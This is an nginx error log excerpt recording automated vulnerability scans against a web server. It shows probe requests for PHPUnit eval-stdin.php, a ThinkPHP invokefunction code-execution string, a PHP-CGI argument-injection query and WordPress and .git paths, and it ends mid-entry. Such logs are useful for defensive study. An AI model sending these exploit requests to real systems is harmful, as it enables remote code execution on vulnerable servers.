+2026/01/19 16:48:05 [error] 437#437: *316904 open() "/var/www/html/api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 62.171.165.176, server: localhost-nginx-proxy-manager, request: "GET /api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 16:48:05 [error] 437#437: *316904 open() "/var/www/html/demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 62.171.165.176, server: localhost-nginx-proxy-manager, request: "GET /demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 16:48:05 [error] 437#437: *316904 open() "/var/www/html/cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 62.171.165.176, server: localhost-nginx-proxy-manager, request: "GET /cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 16:48:05 [error] 437#437: *316904 open() "/var/www/html/crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 62.171.165.176, server: localhost-nginx-proxy-manager, request: "GET /crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 16:48:05 [error] 437#437: *316904 open() "/var/www/html/admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 62.171.165.176, server: localhost-nginx-proxy-manager, request: "GET /admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 16:48:05 [error] 437#437: *316904 open() "/var/www/html/backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 62.171.165.176, server: localhost-nginx-proxy-manager, request: "GET /backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 16:48:05 [error] 437#437: *316904 open() "/var/www/html/blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 62.171.165.176, server: localhost-nginx-proxy-manager, request: "GET /blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 16:48:06 [error] 437#437: *316904 open() "/var/www/html/workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 62.171.165.176, server: localhost-nginx-proxy-manager, request: "GET /workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 16:48:06 [error] 437#437: *316904 open() "/var/www/html/panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 62.171.165.176, server: localhost-nginx-proxy-manager, request: "GET /panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 16:48:06 [error] 437#437: *316904 open() "/var/www/html/public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 62.171.165.176, server: localhost-nginx-proxy-manager, request: "GET /public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 16:48:06 [error] 437#437: *316904 open() "/var/www/html/apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 62.171.165.176, server: localhost-nginx-proxy-manager, request: "GET /apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 16:48:06 [error] 437#437: *316904 open() "/var/www/html/app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 62.171.165.176, server: localhost-nginx-proxy-manager, request: "GET /app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 16:48:06 [error] 437#437: *316904 open() "/var/www/html/index.php" failed (2: No such file or directory), client: 62.171.165.176, server: localhost-nginx-proxy-manager, request: "GET /index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 16:48:06 [error] 437#437: *316904 open() "/var/www/html/public/index.php" failed (2: No such file or directory), client: 62.171.165.176, server: localhost-nginx-proxy-manager, request: "GET /public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 16:48:06 [error] 437#437: *316904 open() "/var/www/html/containers/json" failed (2: No such file or directory), client: 62.171.165.176, server: localhost-nginx-proxy-manager, request: "GET /containers/json HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 17:03:16 [error] 435#435: *316923 open() "/var/www/html/hello.world" failed (2: No such file or directory), client: 42.113.60.198, server: localhost-nginx-proxy-manager, request: "POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 17:03:17 [error] 435#435: *316924 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 23.94.162.106, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 17:03:18 [error] 435#435: *316923 open() "/var/www/html/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 42.113.60.198, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 17:03:20 [error] 435#435: *316923 open() "/var/www/html/vendor/phpunit/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 42.113.60.198, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 17:03:21 [error] 435#435: *316923 open() "/var/www/html/vendor/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 42.113.60.198, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 17:03:22 [error] 435#435: *316923 open() "/var/www/html/vendor/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 42.113.60.198, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 17:03:23 [error] 435#435: *316923 open() "/var/www/html/vendor/phpunit/phpunit/LICENSE/eval-stdin.php" failed (2: No such file or directory), client: 42.113.60.198, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/phpunit/LICENSE/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 17:03:25 [error] 435#435: *316923 open() "/var/www/html/vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 42.113.60.198, server: localhost-nginx-proxy-manager, request: "GET /vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 17:03:26 [error] 435#435: *316923 open() "/var/www/html/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 42.113.60.198, server: localhost-nginx-proxy-manager, request: "GET /phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 17:03:28 [error] 435#435: *316923 open() "/var/www/html/phpunit/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 42.113.60.198, server: localhost-nginx-proxy-manager, request: "GET /phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 17:03:29 [error] 435#435: *316923 open() "/var/www/html/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 42.113.60.198, server: localhost-nginx-proxy-manager, request: "GET /phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 17:03:30 [error] 435#435: *316923 open() "/var/www/html/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 42.113.60.198, server: localhost-nginx-proxy-manager, request: "GET /phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 17:03:32 [error] 435#435: *316923 open() "/var/www/html/lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 42.113.60.198, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 17:03:33 [error] 435#435: *316923 open() "/var/www/html/lib/phpunit/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 42.113.60.198, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 17:03:35 [error] 435#435: *316923 open() "/var/www/html/lib/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 42.113.60.198, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 17:03:36 [error] 435#435: *316923 open() "/var/www/html/lib/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 42.113.60.198, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 17:03:37 [error] 435#435: *316923 open() "/var/www/html/lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 42.113.60.198, server: localhost-nginx-proxy-manager, request: "GET /lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 17:03:39 [error] 435#435: *316923 open() "/var/www/html/laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 42.113.60.198, server: localhost-nginx-proxy-manager, request: "GET /laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 17:03:40 [error] 435#435: *316923 open() "/var/www/html/www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 42.113.60.198, server: localhost-nginx-proxy-manager, request: "GET /www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 17:03:42 [error] 435#435: *316923 open() "/var/www/html/ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 42.113.60.198, server: localhost-nginx-proxy-manager, request: "GET /ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 17:03:43 [error] 435#435: *316923 open() "/var/www/html/yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 42.113.60.198, server: localhost-nginx-proxy-manager, request: "GET /yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 17:03:45 [error] 435#435: *316923 open() "/var/www/html/zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 42.113.60.198, server: localhost-nginx-proxy-manager, request: "GET /zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 17:03:46 [error] 435#435: *316923 open() "/var/www/html/ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 42.113.60.198, server: localhost-nginx-proxy-manager, request: "GET /ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 17:03:47 [error] 435#435: *316923 open() "/var/www/html/V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 42.113.60.198, server: localhost-nginx-proxy-manager, request: "GET /V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 17:03:49 [error] 435#435: *316923 open() "/var/www/html/tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 42.113.60.198, server: localhost-nginx-proxy-manager, request: "GET /tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 17:03:50 [error] 435#435: *316923 open() "/var/www/html/test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 42.113.60.198, server: localhost-nginx-proxy-manager, request: "GET /test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 17:03:51 [error] 435#435: *316923 open() "/var/www/html/testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 42.113.60.198, server: localhost-nginx-proxy-manager, request: "GET /testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 17:03:53 [error] 435#435: *316923 open() "/var/www/html/api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 42.113.60.198, server: localhost-nginx-proxy-manager, request: "GET /api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 17:03:54 [error] 435#435: *316923 open() "/var/www/html/demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 42.113.60.198, server: localhost-nginx-proxy-manager, request: "GET /demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 17:03:55 [error] 435#435: *316923 open() "/var/www/html/cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 42.113.60.198, server: localhost-nginx-proxy-manager, request: "GET /cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 17:03:57 [error] 435#435: *316923 open() "/var/www/html/crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 42.113.60.198, server: localhost-nginx-proxy-manager, request: "GET /crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 17:03:58 [error] 435#435: *316923 open() "/var/www/html/admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 42.113.60.198, server: localhost-nginx-proxy-manager, request: "GET /admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 17:03:59 [error] 435#435: *316923 open() "/var/www/html/backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 42.113.60.198, server: localhost-nginx-proxy-manager, request: "GET /backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 17:04:01 [error] 435#435: *316923 open() "/var/www/html/blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 42.113.60.198, server: localhost-nginx-proxy-manager, request: "GET /blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 17:04:02 [error] 435#435: *316923 open() "/var/www/html/workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 42.113.60.198, server: localhost-nginx-proxy-manager, request: "GET /workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 17:04:04 [error] 435#435: *316923 open() "/var/www/html/panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 42.113.60.198, server: localhost-nginx-proxy-manager, request: "GET /panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 17:04:05 [error] 435#435: *316923 open() "/var/www/html/public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 42.113.60.198, server: localhost-nginx-proxy-manager, request: "GET /public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 17:04:07 [error] 435#435: *316923 open() "/var/www/html/apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 42.113.60.198, server: localhost-nginx-proxy-manager, request: "GET /apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 17:04:08 [error] 435#435: *316923 open() "/var/www/html/app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 42.113.60.198, server: localhost-nginx-proxy-manager, request: "GET /app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 17:04:09 [error] 435#435: *316923 open() "/var/www/html/index.php" failed (2: No such file or directory), client: 42.113.60.198, server: localhost-nginx-proxy-manager, request: "GET /index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 17:04:11 [error] 435#435: *316923 open() "/var/www/html/public/index.php" failed (2: No such file or directory), client: 42.113.60.198, server: localhost-nginx-proxy-manager, request: "GET /public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 17:04:15 [error] 435#435: *316923 open() "/var/www/html/containers/json" failed (2: No such file or directory), client: 42.113.60.198, server: localhost-nginx-proxy-manager, request: "GET /containers/json HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 17:46:15 [error] 435#435: *316966 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 23.94.162.106, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 17:48:09 [error] 435#435: *316968 "/var/www/html/.git/objects/index.html" is not found (2: No such file or directory), client: 185.241.208.170, server: localhost-nginx-proxy-manager, request: "GET /.git/objects/ HTTP/1.1", host: "91.82.83.208" +2026/01/19 17:55:03 [error] 436#436: *316975 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 89.42.231.200, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 18:05:03 [error] 436#436: *316982 open() "/var/www/html/wp-includes/wlwmanifest.xml" failed (2: No such file or directory), client: 34.186.92.186, server: localhost-nginx-proxy-manager, request: "GET /wp-includes/wlwmanifest.xml HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/19 18:05:04 [error] 436#436: *316982 open() "/var/www/html/xmlrpc.php" failed (2: No such file or directory), client: 34.186.92.186, server: localhost-nginx-proxy-manager, request: "GET /xmlrpc.php?rsd HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/19 18:05:05 [error] 436#436: *316982 open() "/var/www/html/blog/wp-includes/wlwmanifest.xml" failed (2: No such file or directory), client: 34.186.92.186, server: localhost-nginx-proxy-manager, request: "GET /blog/wp-includes/wlwmanifest.xml HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/19 18:05:05 [error] 436#436: *316982 open() "/var/www/html/web/wp-includes/wlwmanifest.xml" failed (2: No such file or directory), client: 34.186.92.186, server: localhost-nginx-proxy-manager, request: "GET /web/wp-includes/wlwmanifest.xml HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/19 18:05:06 [error] 436#436: *316982 open() "/var/www/html/wordpress/wp-includes/wlwmanifest.xml" failed (2: No such file or directory), client: 34.186.92.186, server: localhost-nginx-proxy-manager, request: "GET /wordpress/wp-includes/wlwmanifest.xml HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/19 18:05:06 [error] 436#436: *316982 open() "/var/www/html/website/wp-includes/wlwmanifest.xml" failed (2: No such file or directory), client: 34.186.92.186, server: localhost-nginx-proxy-manager, request: "GET /website/wp-includes/wlwmanifest.xml HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/19 18:05:07 [error] 436#436: *316982 open() "/var/www/html/wp/wp-includes/wlwmanifest.xml" failed (2: No such file or directory), client: 34.186.92.186, server: localhost-nginx-proxy-manager, request: "GET /wp/wp-includes/wlwmanifest.xml HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/19 18:05:07 [error] 436#436: *316982 open() "/var/www/html/news/wp-includes/wlwmanifest.xml" failed (2: No such file or directory), client: 34.186.92.186, server: localhost-nginx-proxy-manager, request: "GET /news/wp-includes/wlwmanifest.xml HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/19 18:05:08 [error] 436#436: *316982 open() "/var/www/html/2018/wp-includes/wlwmanifest.xml" failed (2: No such file or directory), client: 34.186.92.186, server: localhost-nginx-proxy-manager, request: "GET /2018/wp-includes/wlwmanifest.xml HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/19 18:05:08 [error] 436#436: *316982 open() "/var/www/html/2019/wp-includes/wlwmanifest.xml" failed (2: No such file or directory), client: 34.186.92.186, server: localhost-nginx-proxy-manager, request: "GET /2019/wp-includes/wlwmanifest.xml HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/19 18:05:09 [error] 436#436: *316982 open() "/var/www/html/shop/wp-includes/wlwmanifest.xml" failed (2: No such file or directory), client: 34.186.92.186, server: localhost-nginx-proxy-manager, request: "GET /shop/wp-includes/wlwmanifest.xml HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/19 18:05:09 [error] 436#436: *316982 open() "/var/www/html/wp1/wp-includes/wlwmanifest.xml" failed (2: No such file or directory), client: 34.186.92.186, server: localhost-nginx-proxy-manager, request: "GET /wp1/wp-includes/wlwmanifest.xml HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/19 18:05:10 [error] 436#436: *316982 open() "/var/www/html/test/wp-includes/wlwmanifest.xml" failed (2: No such file or directory), client: 34.186.92.186, server: localhost-nginx-proxy-manager, request: "GET /test/wp-includes/wlwmanifest.xml HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/19 18:05:10 [error] 436#436: *316982 open() "/var/www/html/media/wp-includes/wlwmanifest.xml" failed (2: No such file or directory), client: 34.186.92.186, server: localhost-nginx-proxy-manager, request: "GET /media/wp-includes/wlwmanifest.xml HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/19 18:05:11 [error] 436#436: *316982 open() "/var/www/html/wp2/wp-includes/wlwmanifest.xml" failed (2: No such file or directory), client: 34.186.92.186, server: localhost-nginx-proxy-manager, request: "GET /wp2/wp-includes/wlwmanifest.xml HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/19 18:05:11 [error] 436#436: *316982 open() "/var/www/html/site/wp-includes/wlwmanifest.xml" failed (2: No such file or directory), client: 34.186.92.186, server: localhost-nginx-proxy-manager, request: "GET /site/wp-includes/wlwmanifest.xml HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/19 18:05:12 [error] 436#436: *316982 open() "/var/www/html/cms/wp-includes/wlwmanifest.xml" failed (2: No such file or directory), client: 34.186.92.186, server: localhost-nginx-proxy-manager, request: "GET /cms/wp-includes/wlwmanifest.xml HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/19 18:05:12 [error] 436#436: *316982 open() "/var/www/html/sito/wp-includes/wlwmanifest.xml" failed (2: No such file or directory), client: 34.186.92.186, server: localhost-nginx-proxy-manager, request: "GET /sito/wp-includes/wlwmanifest.xml HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/19 18:21:05 [error] 436#436: *316997 open() "/var/www/html/hello.world" failed (2: No such file or directory), client: 5.189.153.209, server: localhost-nginx-proxy-manager, request: "POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 18:21:05 [error] 436#436: *316997 open() "/var/www/html/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 5.189.153.209, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 18:21:05 [error] 436#436: *316997 open() "/var/www/html/vendor/phpunit/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 5.189.153.209, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 18:21:05 [error] 436#436: *316997 open() "/var/www/html/vendor/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 5.189.153.209, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 18:21:05 [error] 436#436: *316997 open() "/var/www/html/vendor/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 5.189.153.209, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 18:21:05 [error] 436#436: *316997 open() "/var/www/html/vendor/phpunit/phpunit/LICENSE/eval-stdin.php" failed (2: No such file or directory), client: 5.189.153.209, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/phpunit/LICENSE/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 18:21:06 [error] 436#436: *316997 open() "/var/www/html/vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 5.189.153.209, server: localhost-nginx-proxy-manager, request: "GET /vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 18:21:06 [error] 436#436: *316997 open() "/var/www/html/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 5.189.153.209, server: localhost-nginx-proxy-manager, request: "GET /phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 18:21:06 [error] 436#436: *316997 open() "/var/www/html/phpunit/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 5.189.153.209, server: localhost-nginx-proxy-manager, request: "GET /phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 18:21:06 [error] 436#436: *316997 open() "/var/www/html/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 5.189.153.209, server: localhost-nginx-proxy-manager, request: "GET /phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 18:21:06 [error] 436#436: *316997 open() "/var/www/html/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 5.189.153.209, server: localhost-nginx-proxy-manager, request: "GET /phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 18:21:06 [error] 436#436: *316997 open() "/var/www/html/lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 5.189.153.209, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 18:21:06 [error] 436#436: *316997 open() "/var/www/html/lib/phpunit/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 5.189.153.209, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 18:21:06 [error] 436#436: *316997 open() "/var/www/html/lib/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 5.189.153.209, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 18:21:06 [error] 436#436: *316997 open() "/var/www/html/lib/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 5.189.153.209, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 18:21:06 [error] 436#436: *316997 open() "/var/www/html/lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 5.189.153.209, server: localhost-nginx-proxy-manager, request: "GET /lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 18:21:06 [error] 436#436: *316997 open() 